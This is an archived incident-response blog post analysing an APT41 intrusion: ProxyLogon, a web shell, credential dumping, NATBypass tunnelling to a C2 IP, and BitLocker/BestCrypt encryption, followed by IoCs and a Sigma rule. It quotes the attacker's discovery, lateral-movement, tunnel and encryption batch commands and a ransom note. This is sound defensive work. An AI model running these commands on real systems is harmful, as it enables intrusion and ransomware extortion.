{
	"id": "574de0e9-9963-46aa-8164-44097c584599",
	"created_at": "2026-04-06T00:10:48.818946Z",
	"updated_at": "2026-04-10T13:12:07.460915Z",
	"deleted_at": null,
	"sha1_hash": "6767fd3af527538ea0892fb48215fc6b1a17fc1d",
	"title": "APT41 — The spy who failed to encrypt me",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1520389,
	"plain_text": "APT41 — The spy who failed to encrypt me\r\nBy DCSO CyTec Blog\r\nPublished: 2023-01-30 · Archived: 2026-04-05 23:50:42 UTC\r\n18 min read\r\nDec 24, 2022\r\nThis blog post is based on our recent investigation into one of APT41’s operations against an unnamed German\r\ncompany from the financial sector. The company contacted us in March 2022 after discovering a ransom note (as\r\npresented below) on several of its servers. The threat actor tried to encrypt multiple workstations in the client’s\r\nenvironment which was thwarted by Microsoft Defender for Endpoint (MDE). As part of this incident response\r\nengagement DCSO’s Incident Response Team (DIRT) supported the client in determining the scope of the\r\nincident, identifying the initial attack vector and providing remediation support.\r\nHello. All your servers are encrypted.\r\nPlease contact: KalajaTomorr@ctemplar.com\r\nspare email: KalajaTomorr@firemail.cc\r\nYour identity code: ************\r\nContact us to get the decryption method. You can first understand how to buy Bitcoin and pay.\r\nOnly we can decrypt, please do not believe any decryption tool. 
Your recovery method will cause data\r\nto be destroyed and irreversible.\r\nDuring this incident response engagement DIRT performed a forensic analysis of multiple servers and\r\nworkstations which allowed us to determine that:\r\nThe initial attack vector was a vulnerable “Microsoft Exchange Server” that was compromised with the\r\nhelp of the “ProxyLogon” exploit.\r\nThe threat actor used a “China Chopper” web shell to persist on the compromised “Microsoft Exchange\r\nServer”.\r\nThe threat actor laterally moved from the patient zero to a domain controller after performing initial\r\ncredential dumping activities.\r\nThe threat actor used a second domain controller as a “base” to stage his encryption attack against\r\nworkstations and servers in the environment.\r\nThe threat actor used “Jetico’s BestCrypt” for server encryption and “Microsoft BitLocker” for the\r\nencryption of workstations.\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 1 of 19\n\nThe threat actor accessed compromised systems through RDP by exposing the RDP port to the internet\r\nwith the help of “NATBypass”.\r\nMerry Xmas and a Happy New Year from Denis Szadkowski, Johann Aydinbas, Hendrik Bäcker and Jiro Minier.\r\nTimeline\r\nSimplified Timeline of Security Incident (Timestamps in UTC)\r\nInitial Access\r\nThe threat actor gained initial access in March 2021 by exploiting a chain of vulnerabilities known as\r\n“ProxyLogon” (CVE-2021-26855, CVE-2021-27065). During the forensic examination of the affected system,\r\nDIRT found the typical signs of “ProxyLogon” exploitation, which are the execution of the PowerShell cmdlets\r\nSet-OabVirtualDirectory, Remove-OabVirtualDirectory and New-OabVirtualDirectory. Those events were\r\nretrieved from the MSExchange Management log (Event ID 1). 
By exploiting the “ProxyLogon” vulnerability the\r\nthreat actor was able to drop a “China Chopper” web shell supp0rt.aspx on the client’s Exchange server:\r\nC:\\inetpub\\wwwroot\\aspnet_client\\supp0rt.aspx\r\nThe contents of the web shell are presented below:\r\n\u003cscript language=\"JScript\" runat=\"server\"\u003efunction Page_Load(){eval(System.Text.Encoding.UTF8.GetStri\r\nSecond Appearance\r\nAfter a year of inactivity the threat actor returned in March 2022 to further penetrate the compromised\r\nnetwork. In the meantime, the client’s Exchange Server had been fully patched. Unfortunately, the client forgot to\r\nremove the already existing web shell before applying security patches, which enabled the threat actor to return a\r\nyear later.\r\nThe first post-exploitation activity that the threat actor conducted on the compromised Exchange Server was to\r\nupload Sysinternals’ “Procdump” ( procdump64.exe ) and “NATBypass” ( na.exe ) to the staging directory\r\naspnet_client . Shortly after completing the upload the threat actor used “Procdump” to perform credential\r\ndumping activities. DIRT found a corresponding Amcache entry that proves the execution of “Procdump”.\r\nAdditionally, the registry key EulaAccepted was set on the Exchange server, which is an indicator of the usage of\r\nSysinternals’ “Procdump”.\r\nOne interesting detail to note about the tool uploads is that certain tools, for example “NATBypass” ( na.exe ),\r\nwere uploaded in cabinet archives. 
This behavior was repeated during the discovery stage of the attack, in which\r\nthe threat actor collected the outputs of his discovery scripts in cabinet archives.\r\n$ file na\r\nna: Microsoft Cabinet archive data, Windows 2000/XP setup, 979933 bytes, 1 file, at 0x2c +A \"na.exe\"\r\nPrivilege Escalation\r\nAs described in the section “Initial Access”, the patient zero system showed signs of “ProxyLogon” exploitation.\r\nIn fact, DIRT was able to confirm the exploitation by reviewing the Exchange server logs of the affected system.\r\n“ProxyLogon” allows the attacker to drop a web shell into a publicly accessible web path of a vulnerable\r\nExchange server that subsequently serves as a persistent backdoor. Additionally, the web shell is executed with the\r\nprivileges of the account used to run the application pool of the IIS server. By default this is NT\r\nAuthority\\SYSTEM , which was also the case for our client.\r\nTherefore, by exploiting “ProxyLogon” to drop a web shell, the attacker can easily gain SYSTEM privileges and\r\nachieve persistence on the target system.\r\nDefensive Evasion\r\nThe threat actor didn’t use any sophisticated techniques to avoid detection or to bypass security products. But\r\nsometimes simplicity can be the ultimate sophistication. DIRT observed that the threat actor relied on three types\r\nof tools: already present tools, custom tools and commercial off-the-shelf tools. 
Additionally, the threat actor\r\nshowed some routine in deleting his tools in order to hinder forensic analysis.\r\nOne thing that DIRT observed was that the batch scripts used by the threat actor always contained a line of code to\r\ndelete the batch script itself and its outputs:\r\nT1070.004:\r\ndel *.txt \u0026 del *.bat \u0026del *.log\u0026del setup.*\u0026del *.bat\r\nAnother technique that was observed by DIRT during this intrusion falls into the category of “Living off the\r\nLand”, in which the threat actor leverages already existing tools present in the target environment.\r\nIn this case the threat actor leveraged Microsoft BitLocker for the encryption of workstations. This approach\r\nprovides the benefit that no development costs need to be spent on custom ransomware; instead the already\r\npresent Microsoft BitLocker is used to achieve encryption. Furthermore, the usage of Microsoft BitLocker is not\r\nunusual in corporate environments, which makes detection more challenging.\r\nIn addition to living-off-the-land tools, the threat actor used the commercial, off-the-shelf encryption software Jetico\r\nBestCrypt for server encryption purposes. One might argue that using this software (which is digitally signed by\r\n“Jetico Inc. Oy”) allowed the threat actor to stay under the radar. From a threat actor’s perspective, commercial, off-the-shelf encryption software like Jetico BestCrypt has the potential to be misused as ransomware that is digitally\r\nsigned and trusted by anti-virus vendors.\r\nCredential Access\r\nThe first post-exploitation activities that the threat actor performed after compromising the patient zero system\r\nwere to upload several tools, for example “Procdump” and “NATBypass”, to the staging directory\r\naspnet_client . Next the threat actor used “Procdump” to create a memory dump of the LSASS process. DIRT\r\nfound a corresponding Amcache entry that proves the execution of “Procdump”. 
In addition to that the\r\nregistry key EulaAccepted was set, which is related to the usage of the argument -accepteula which was\r\nsupplied during the execution of procdump64.exe .\r\nForensic Artifacts — Credential Access\r\nLast but not least DIRT found forensic evidence of execution that shows that the threat actor used a tool called\r\nC:\\PerfLogs\\secretsdump.exe on one of the domain controllers in the compromised environment. By looking\r\nup the hash on VirusTotal we were able to confirm that secretsdump.exe is the “PyInstaller” version of\r\nImpacket’s secretsdump.py .\r\nThe threat actor leveraged the tool to create an LSA secrets dump hashes.txt and store its contents in the staging\r\ndirectory C:\\PerfLogs\\ .\r\nThe credential access activities performed by the threat actor resulted in the exposure of the credentials of two\r\ndomain administrator accounts from different domains within the client’s Active Directory forest.\r\nThose credentials were subsequently used for lateral movement purposes.\r\nDiscovery\r\nDIRT observed that during the post-exploitation stage of the attack the threat actor conducted extensive discovery\r\nactivities that were aimed at identifying suitable targets for encryption purposes. 
The following code listing shows\r\nthe contents of the batch script C:\\PerfLogs\\cmd-webshell.txt which was obtained from a compromised\r\ndomain controller.\r\n@echo off\r\nset dir1=\\perflogs\r\nmkdir %dir1%\r\ncd %dir1%\r\ndel *.txt \u0026del *.log\r\nnet time /domain \u003e%dir1%\\info.txt\r\nwhoami \u003e\u003e%dir1%\\info.txt\r\nipconfig /all \u003e\u003e%dir1%\\info.txt\r\nnet group \"domain admins\" /domain\u003e\u003e%dir1%\\info.txt\r\ndsquery server \u003e\u003e%dir1%\\info.txt\r\nnltest /domain_trusts /all_trusts \u003e\u003e%dir1%\\info.txt\r\nwmic /namespace:\\\\root\\securitycenter2 dir1 antivirusproduct get displayname,productstate,dir1tosigne\r\ndsquery * -limit 0 -filter \"(\u0026(objectCategory=computer)(objectClass=computer))\" -attr cn operatingSys\r\nfindstr -c:\"Windows Server\" computers.txt \u003eserver.txt\r\nfindstr -c:\"Windows 10\" computers.txt \u003eWin10.txt\r\nfor /f \"tokens=1*\" %%a in (server.txt) do echo %%a\u003e\u003eip.txt\r\np.exe \u0026 rename o.txt Server-ping.txt \u0026del ip.txt\r\nfor /f \"tokens=1*\" %%a in (Win10.txt) do echo %%a\u003e\u003eip.txt\r\np.exe \u0026 rename o.txt Win10-ping.txt \u0026del ip.txt\r\ndel p.exe \u0026del server.txt \u0026del Win10.txt\r\nfind /i /c \" \" Win10-ping.txt\r\nfind /i /c \" \" Server-ping.txt\r\nfindstr /c:\"NT 5\" info.txt\r\necho computers.txt\u003elist.txt\u0026echo info.txt\u003e\u003elist.txt\u0026echo Server-ping.txt\u003e\u003elist.txt\u0026echo Win10-ping.tx\r\nmakecab /f list.txt /d maxdisksize=1001024000\r\necho \"finish!!!\"\r\ndel *.txt \u0026 del *.bat \u0026del *.log\u0026del setup.*\u0026del *.bat\r\nThe script runs multiple tools/commands to gather information about the compromised system and its\r\nenvironment. Most of the commands are built-in tools shipped with Microsoft Windows. But there is one\r\nexception, a tool named p.exe . 
This custom tool is known as “MiPing”. It can be described as a threaded\r\n“pinger” used to discover active systems within the compromised environment. It takes a list of IP addresses in the\r\nform of a text file named ip.txt and then returns a file named o.txt that contains information about the\r\navailability of the systems previously specified in the text file ip.txt . “MiPing” was first discovered by\r\nLIFARS and described in their report “APT41 — The Spy Who Encrypted Me”. The report links “MiPing” to an\r\nintrusion conducted by APT41. The investigation results led to a criminal indictment of seven defendants by the\r\nUS Department of Justice.\r\nAnother notable detail about the discovery script is that it distinguishes between workstations ( Win10-ping.txt )\r\nand servers ( Server-ping.txt ). This distinction is relevant because the threat actor uses a different encryption\r\ntechnique depending on whether the target system is a workstation or a server. DIRT observed that the threat actor\r\nused “Jetico BestCrypt” for the encryption of servers and “Microsoft BitLocker” for the encryption of\r\nworkstations. This observation was also made by SYNACKTIV in their “Unransomware” blog post, which details\r\na similar intrusion.\r\nAfter the execution of all discovery commands their outputs are stored in individual text files, which are then\r\ncombined into a single text file called C:\\PerfLogs\\list.txt . In the end the single text file gets archived with\r\nthe makecab.exe utility. This collection behavior was also observed by Cybereason’s Incident Response Team as\r\ndescribed in their blog post “Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques”.\r\nA final thing to note is that at times the threat actor executed the discovery commands presented in the script\r\nmanually, which failed on multiple occasions because of typos. 
During the forensic analysis DIRT examined the\r\nRDP Bitmap Cache belonging to one of the compromised domain administrator accounts and the following\r\nexecution of nltest.exe was spotted:\r\nRDP Bitmap Cache — Manual Discovery Activities\r\nLateral Movement\r\nAfter compromising the patient zero system (Exchange server) the threat actor moved laterally to a neighboring\r\ndomain controller (DC) by leveraging the Remote Desktop Protocol (RDP) and the previously dumped domain\r\nadministrator credentials. Subsequently, the compromised DCs were used as a “base” to initiate encryption\r\nactivities on workstations and servers in the environment. The threat actor used network shares and the Server\r\nMessage Block (SMB) protocol to copy batch scripts to target systems and then execute them through Windows\r\nManagement Instrumentation (WMI). The following listing shows an abstraction of the techniques leveraged by\r\nthe threat actor:\r\nT1021.002:\r\ncopy \"[FILE]\" \\\\[TARGET]\\c$\\ /y\r\nT1021.003:\r\nfor /f %%y in ([TARGETS]) do wmic /failfast:10000 /node:\"%%y\" /USER:\"DOMAIN\\administrator\" /PASSWORD\r\nCollection\r\nThe threat actor performed collection activities with the help of a built-in Microsoft Windows tool named\r\nmakecab.exe . This tool is used to create cabinet archives. 
During our investigation we found evidence for the\r\nusage of makecab.exe and the execution of the following command line:\r\nT1560.001:\r\nmakecab /f \u003cSOMEFILE\u003e /d maxdisksize=1001024000\r\nThe threat actor also used cabinet archives for bringing his own tools onto compromised systems, e.g., the tool\r\n“NATBypass” ( na.exe ) was uploaded in the form of a cabinet archive named na .\r\n$ file na\r\nna: Microsoft Cabinet archive data, Windows 2000/XP setup, 979933 bytes, 1 file, at 0x2c +A \"na.exe\"\r\nCommand and Control\r\nThe threat actor accessed compromised servers directly from the internet through RDP. This was accomplished by\r\nexposing the local RDP ports of compromised systems to the internet with the help of a tool called NATBypass\r\n( na.exe ). Since the threat actor was heavily relying on RDP for command and control, DIRT spent some time\r\nexamining the RDP Bitmap Cache associated with the domain administrator account that was used during the\r\nintrusion. This revealed the command line below, which was used to forward the local RDP port from the\r\ncompromised internal server to the threat actor’s command and control (C2) server:\r\nna.exe -slave 127.0.0.1:3389 185.23.214.111:10001\r\nNATBypass — RDP BitmapCache\r\nAfter running the above command, a reverse tunnel is established from the compromised server to the attacker\r\ncontrolled machine on the internet ( 185.23.214.111 ). Eventually, the RDP port 3389 of the compromised\r\ninternal server can be accessed interactively through RDP by connecting to 185.23.214.111 on port 10001 .\r\nThis technique allows the threat actor to bypass firewall restrictions that usually prevent inbound RDP connections\r\nfrom the internet. 
The following figure summarizes the previously described technique that the threat actor used\r\nfor accessing the client’s domain controller through RDP:\r\nNATBypass — Forwarding RDP\nOne interesting detail that DIRT noticed during the forensic analysis was that each time the threat actor accessed\nservers through the forwarded RDP port two types of terminal service related events ( 24 and 25 ) were\ngenerated on the destination systems. Those particular events all had in common that the contained source address\nof the RDP session was 127.0.0.1 . This is the case because the RDP connection is originating from the\npreviously established tunnel and therefore the RDP service logs it as a local connection.\nEvent XML excerpt (field values fused by extraction): 23324 Microsoft-Windows-TerminalServices-LocalSessionManager/Operational DC.company.corp DOMAIN\\administrator 2\n\u003cAddress\u003e127.0.0.1\u003c/Address\u003e\r\n \u003c/EventXML\u003e\r\n \u003c/UserData\u003e\r\n\u003c/Event\u003e\r\nThe investigation of the IP ( 185.23.214.111 ) used by the threat actor revealed that at some point in time the\r\nsystem was used as a Cobalt Strike Team Server. Unfortunately, at the time of investigation the team server didn’t\r\nserve Cobalt Strike beacons anymore. DIRT spent extensive time reviewing the collected evidence to see if there\r\nwere any indicators that would prove that Cobalt Strike was used during the intrusion. But no such evidence could\r\nbe found.\r\nCobalt Strike Server identified by Twitter user @drb_ra\r\nImpact\r\nDuring the forensic analysis of one of the affected domain controllers (DC) in the client’s environment we found\r\nthat the threat actor was using the DC as a “base” to launch the encryption of neighboring servers. 
As DIRT\r\nexamined the DC, a directory named C:\\tools\\ was found that contained a bunch of batch scripts and the sub-directory crypt . The purpose of the batch scripts was to perform some preparation tasks before initiating the\r\nencryption of the target systems. The code listing below shows the contents of the batch script 1.bat that was\r\nfound in the mentioned directory:\r\nfor /f %%i in (address.txt) do start /b xcopy \"c:\\tools\\crypt\" \\\\%%i\\c$\\crypt\\ /e /y /h\r\nfor /f %%i in (address.txt) do start /b copy \"c:\\tools\\Readme.txt\" \\\\%%i\\c$\\ /y\r\nfor /f %%i in (address.txt) do start /b copy \"c:\\tools\\copy.txt\" \\\\%%i\\c$\\windows\\copys.bat /y\r\nThe script 1.bat consists of three for-loops that use the built-in Microsoft Windows tools copy and xcopy to\r\nmove some files from the staging directory of the DC to the encryption targets specified in the text file\r\naddress.txt . The first for-loop is responsible for copying a tool named “Jetico BestCrypt” which is located in\r\nthe directory C:\\tools\\crypt . “Jetico BestCrypt” is a commercial, off-the-shelf application that is able to\r\nencrypt disk volumes or individual files. APT41 has a track record of using “Jetico BestCrypt”, which has\r\nbeen documented by LIFARS in their APT41 report “The Spy Who Encrypted Me”. Throughout our investigation\r\nwe noticed that the threat actor used “Jetico BestCrypt” exclusively for the encryption of servers. For the\r\nencryption of workstations the threat actor relied on Microsoft BitLocker.\r\nThe purpose of the second for-loop is to copy the ransom note Readme.txt from the staging directory on the DC\r\nto the root of the C:\\ volume on the target servers. 
After the ransom note has been placed on the target servers\r\nthe third for-loop copies a batch script named copys.bat to the directory C:\\Windows\\ on the target server. In\r\nthe following code listing the contents of the batch-script C:\\Windows\\copys.bat are presented which were\r\nobtained from one of the target servers:\r\ncopy \"c:\\Readme.txt\" \"c:\\Documents and Settings\\All Users\\desktop\\Readme 1.txt\" /y\r\n[...]\r\ncopy \"c:\\Readme.txt\" \"c:\\Documents and Settings\\All Users\\desktop\\Readme 9.txt\" /y\r\ncopy \"c:\\Readme.txt\" \"c:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\Readme.txt\" /y\r\ncopy \"c:\\Readme.txt\" \"c:\\users\\public\\desktop\\Readme 1.txt\" /y\r\n[...]\r\ncopy \"c:\\Readme.txt\" \"c:\\users\\public\\desktop\\Readme 9.txt\" /y\r\ncopy \"c:\\Readme.txt\" \"c:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Readme.txt\" /y\r\nfor /L %%i in (1,1,100) do copy \"C:\\Readme.txt\" \"C:\\Users\\Public\\Desktop\\Readme %%i.txt\" /y\r\nshutdown -r -t 30 -f\r\nThe batch script copys.bat is responsible for copying the ransom note from the root of the C:\\ volume to\r\ndifferent paths on the target server. Subsequently, the batch script copys.bat is executed with the help of another\r\nbatch script named end.bat which again was located in the staging directory on the DC. 
The code listing below\r\nshows the contents of end.bat :\r\nfor /f %%y in (address.txt) do wmic /failfast:10000 /node:\"%%y\" /USER:\"DOMAIN\\administrator\" /PASSWOR\r\nAs can be seen from the code listing above the threat actor used wmic.exe and a domain administrator account to\r\nexecute the batch script copys.bat on the target servers.\r\nAfter transferring “Jetico BestCrypt” and a ransom note to the target system, the threat actor used RDP to connect\r\nto the servers and then execute “Jetico BestCrypt” to perform the encryption. The process of encrypting server\r\nsystems is summarized in the following graphic:\r\nDistribution of Jetico BestCrypt\r\nAs previously mentioned the server encryption was performed in a slightly different way compared to the\r\nencryption of workstations. Instead of using “Jetico BestCrypt” the threat actor leveraged the built-in tool\r\nMicrosoft BitLocker and a couple of batch scripts to automate the process. The code listing below shows the\r\ncontents of the batch script C:\\WINDOWS\\test.bat , which was previously copied to the workstation from one of\r\nthe DCs.\r\nThe batch script is responsible for enabling BitLocker encryption for all the volumes present in the workstation. 
In\r\nfact the file test.bat is unique for each workstation and contains a different BitLocker recovery password.\r\nreg delete HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v EnableBDEWithNoTPM /t REG_DWORD /d \"0\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v UseAdvancedStartup /t REG_DWORD /d \"0\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v RecoveryKeyMessage /t REG_SZ /d \"Что\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v RecoveryKeyMessageSource /t REG_DWORD\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v RecoveryKeyUrl /t REG_SZ /d \"\" /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v ActiveDirectoryBackup /t REG_DWORD /d\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v ActiveDirectoryInfoToStore /t REG_DWO\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v RequireActiveDirectoryBackup /t REG_D\r\nCScript //H:CScript //S\r\nmanage-bde -on A: -rp 366872-032054-377806-330154-718707-337205-661793-443619 -UsedSpaceOnly -sk C:\\\r\n[...]\r\nmanage-bde -on Z: -rp 366872-032054-377806-330154-718707-337205-661793-443619 -UsedSpaceOnly -sk C:\\\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v UseTPM /t REG_DWORD /d \"0x02\" /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v UseTPMPIN /t REG_DWORD /d \"0x00\" /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v UseTPMKey /t REG_DWORD /d \"0x01\" /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v UseTPMKeyPIN /t REG_DWORD /d \"0x00\" /\r\nmanage-bde -protectors -add C: -TPMAndStartupKey C:\\\r\nattrib -s -h C:\\*.BEK\r\ndel C:\\*.BEK /f /q\r\nmanage-bde -status 
\u003e C:\\[IP].txt\r\nshutdown /r /t 1800 /f\r\ndel C:\\Windows\\test.bat /f /q\r\nBesides the test.bat batch script we found numerous other references to batch scripts in the UsnJrnl of the\r\nDC.\r\n2022-03-07 10:22:59.480516 | 1.bat | ARCHIVE | BASIC_INFO_CHANGE CLOSE\r\n2022-03-07 10:22:59.770462 | 192.168.0.1.bat | ARCHIVE | FILE_CREATE\r\n2022-03-07 10:22:59.790461 | 192.168.0.2.bat | ARCHIVE | DATA_EXTEND FILE_CREATE\r\n[...]\r\n2022-03-07 10:39:18.934895 | 192.168.0.100.bat | ARCHIVE | FILE_DELETE CLOSE\r\n2022-03-07 10:39:18.934895 | getstatus.bat | ARCHIVE | FILE_DELETE CLOSE\r\n2022-03-07 10:39:18.934895 | lock.bat | ARCHIVE | FILE_DELETE CLOSE\r\n2022-03-07 10:40:06.341251 | end.bat | ARCHIVE | DATA_OVERWRITE DATA_EXTEND\r\nThe first batch script in the UsnJrnl excerpt above is 1.bat . It was used by the threat actor to move the batch scripts C:\\\\bitlocker\\cmd\\[IP].bat to the directory C:\\WINDOWS\\test.bat on the target workstation. Its\r\ncontents are presented below:\r\nfor /f %%i in (ip.txt) do copy \"c:\\\\bitlocker\\cmd\\%%i.bat\" \\\\%%i\\c$\\WINDOWS\\test.bat /y\r\nAs soon as the [IP].bat file was transferred from the DC to all workstations in the environment the threat actor\r\nexecuted a batch script named lock.bat . The purpose of lock.bat was to execute test.bat with the help of\r\nWMIC and the previously obtained domain administrator credentials. Luckily for the customer, Microsoft\r\nDefender for Endpoint detected C:\\WINDOWS\\test.bat as Ransom:BAT/BLJammer.A!dha and prevented its\r\nexecution, which thwarted the encryption.\r\nfor /f %%i in (ip.txt) do wmic /node:\"%%i\" /USER:\"DOMAIN\\administrator\" /PASSWORD:\"XXXXXXXXX\" process\r\nFurthermore, DIRT found another batch script named getstatus.bat that would have allowed the threat actor to\r\ncollect a file C:\\[IP].txt from all workstations. 
The file C:\\[IP].txt contains the status of Microsoft\r\nBitLocker encryption upon successful execution of test.bat .\r\nfor /f %%i in (ip.txt) do copy \\\\%%i\\C$\\%%i.txt C:\\\\bitlocker\\status\\\r\nMiPing Technical Analysis\r\nMiPing, first described by LIFARS in their “APT41 — The Spy Who Encrypted Me” paper, is a custom multi-threaded connection tester. It takes a line-based file of hostnames named ip.txt as input and records the result\r\nof its testing in a file named o.txt .\r\nTo determine reachability, MiPing initially attempts to ping each host (ICMP ECHO) while recording successes in\r\nthe output file. In the event that no ping response is received, MiPing proceeds to iterate through a list of 4\r\nhardcoded ports (445, 135, 22 and 80) and attempts to connect to each. If any connection succeeds, the host is also\r\nrecorded as reachable in the output file.\r\nMiPing attempting to connect on hardcoded ports after pinging failed\r\nICMP ECHO packets generated by MiPing contain a custom hardcoded payload Data Buffer :\r\nHardcoded ICMP ECHO payload\r\nOur testing however showed that the payload is not suitable for network signature generation, as the same payload\r\nstring appears to be used in commercial software, including games.\r\nMiPing also offers command line switches to influence its behavior:\r\n-m \u003ctimeout\u003e can be used to change network timeouts\r\n-t \u003cnum\u003e can be used to change the number of threads to use\r\nSimilarities With Publicly Disclosed Attacks\r\nThe tactics, techniques and procedures (TTPs) observed in this case align with several publicly disclosed security\r\nincidents that were attributed to APT41 with medium-high confidence. 
The most noteworthy publications that\r\nsupport this attribution claim are:\r\nThe Spy Who Encrypted Me — LIFARS\r\nRansomware as a tool for diversion and coverup. A possible modus operandi for advanced persistent\r\nthreats? — Raphael Enio Hoheisel\r\nGood for Evil: DeepBlueMagic Ransomware Group Abuses Legit Encryption Tools — Varonis\r\nSuspected Chinese hackers behind attacks on ten Israeli hospitals — Bleeping\r\nDisrupting an Active Ransomware Attack Over the Course of Hours — eSentire\r\nDeepBlueMagic Ransomware: APT41’s arsenal? — Medium\r\nUNRANSOMWARE — SYNACKTIV\r\nThe publicly disclosed security incidents referenced in this article all have in common that the threat actor\r\nleveraged Jetico BestCrypt and Microsoft BitLocker to encrypt compromised systems. Additionally, the ransom\r\nnotes discovered as part of the security incident all follow the same format. Furthermore, in all observed cases the\r\nthreat actors relied on batch scripts for discovery purposes and to facilitate the encryption of systems.\r\nIoCs\r\nNATBypass (na.exe):\r\n4550635143c9997d5499d1d4a4c860126ee9299311fed0f85df9bb304dca81ff\r\nNATBypass Cabinet Archive (na):\r\ne518b80316bf1c349943040e4d26401958846c2596e58f1c98be835ecf29b381\r\nBitlocker encryption batch-script (test.bat):\r\n7b4f69b00d72fac3ed2c0b25d424f013f96537c563906b782742da15c72e9147\r\nBitlocker encryption prep batch-script (copys.bat):\r\n180efca9b5560e02f957f49f0b272339561483232adf0714021d6b32b737e707\r\nDistribute Jetico BestCrypt batch-script (1.bat):\r\n011e9aaa6251db149d1693c02a8c6407012520fb9b2f8f47e64b897017c0e673\r\nExecute bitlocker encryption batch-script (end.bat):\r\n28be4681480932361d75cfc360baf2c8c6d13b28d019e3dd053184894b994ef3\r\nMiPing (p.exe):\r\n806761850d19f0cc9f41618e74db471e85c494e952f900f827c1779f2d1c4d31\r\nDiscovery batch-script 
(cmd-webshell.txt):\r\nbc20f4c28cbdf38eba69eb144a89c20c162481955d4cff8bdf02ba9644865523\r\nChina Chopper Web Shell (supp0rt.aspx):\r\n367b8052db12cb9ddce01275fc213480831dc5fe9aa3da64fecc2360267905a0\r\nJetico BestCrypt (bcfmgr.exe):\r\n0a560fa01d6e4eb30fe35be3b07e8024df212840d188bea1b2c047a6f0ffe2af\r\nC2 IP:\r\n185.23.214.111\r\nFiles and Paths:\r\nC:\\inetpub\\wwwroot\\aspnet_client\\supp0rt.aspx\r\nSYSVOL\\_BAD_crypt\\bcfmgr.exe\r\nC:\\inetpub\\wwwroot\\aspnet_client\\Procdump.exe\r\nC:\\inetpub\\wwwroot\\aspnet_client\\Procdump64.exe\r\nC:\\inetpub\\wwwroot\\aspnet_client\\na.exe\r\nC:\\PerfLogs\\secretsdump.exe\r\nC:\\PerfLogs\\hashes.txt\r\nC:\\Windows\\copys.bat\r\nC:\\tools\\crypt\\x64\\bcfnt.sys\r\nC:\\Readme.txt\r\nC:\\tools\\disk.txt\r\nC:\\PerfLogs\\1.bat\r\nC:\\tools\\1.bat\r\nC:\\tools\\address.txt\r\nC:\\tools\\end.bat\r\nC:\\tools\\crypt\\bcfmgr.exe\r\nC:\\tools\\copy.txt\r\nC:\\PerfLogs\\cmd-webshell.txt\r\nC:\\PerfLogs\\p.exe\r\nMicrosoft Defender for Endpoint Signature:\r\nRansom:BAT/BLJammer.A!dha\r\nMITRE ATT\u0026CK\r\nT1003.001: OS Credential Dumping: LSASS Memory\r\nT1003.004: OS Credential Dumping: LSA Secrets\r\nT1018: Remote System Discovery\r\nT1021.001: Remote Services: Remote Desktop Protocol\r\nT1021.002: Remote Services: SMB/Windows Admin Shares\r\nT1021.003: Remote Services: Distributed Component Object Model\r\nT1047: Windows Management Instrumentation\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1069.002: Permission Groups Discovery: Domain Groups\r\nT1070.004: Indicator Removal: File Deletion\r\nT1087.002: Account Discovery: Domain Account\r\nT1124: System Time Discovery\r\nT1190: Exploit Public-Facing Application\r\nT1482: Domain Trust Discovery\r\nT1486: Data Encrypted for Impact\r\nT1505.003: Server Software Component: Web Shell\r\nT1518.001: Software Discovery: Security Software 
Discovery\r\nT1560.001: Archive Collected Data: Archive via Utility\r\nT1572: Protocol Tunneling\r\nTools and Tactics\r\nJetico’s BestCrypt (Impact)\r\nBitlocker (Impact)\r\nMiPing (Discovery)\r\nNATBypass (Command and Control)\r\nmakecab (Collection)\r\ndsquery (Discovery)\r\nwhoami (Discovery)\r\nipconfig (Discovery)\r\nwmic (Discovery/Execution)\r\nnltest (Discovery)\r\nnet (Discovery)\r\ndel (Defense Evasion)\r\nDetections\r\nSigma rule to detect RDP usage through a previously exposed RDP port (by using tools such as NATBypass):\r\ntitle: NATBypass Usage with Remote Desktop Service\r\nid: c7e80b57-0ffc-4c46-b6c2-6bc0a245dffc\r\nstatus: experimental\r\ndescription: RDP login with localhost source address may be a tunnelled login\r\nreferences:\r\n  - https://medium.com/p/24fc0f49cad1\r\n  - https://github.com/cw1997/NATBypass/\r\nauthor: Hendrik Baecker\r\ndate: 2022/11/28\r\ntags:\r\n  - attack.command_and_control\r\n  - attack.t1090\r\nlogsource:\r\n  product: windows\r\n  service: security\r\ndetection:\r\n  selection:\r\n    EventID:\r\n      - 4778\r\n      - 4779\r\n    ClientAddress:\r\n      - '::1'\r\n      - '127.0.0.1'\r\n    SessionName|startswith: 'RDP-Tcp'\r\n  condition: selection\r\nfalsepositives:\r\n  - Unknown\r\nlevel: high\r\nSource: https://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
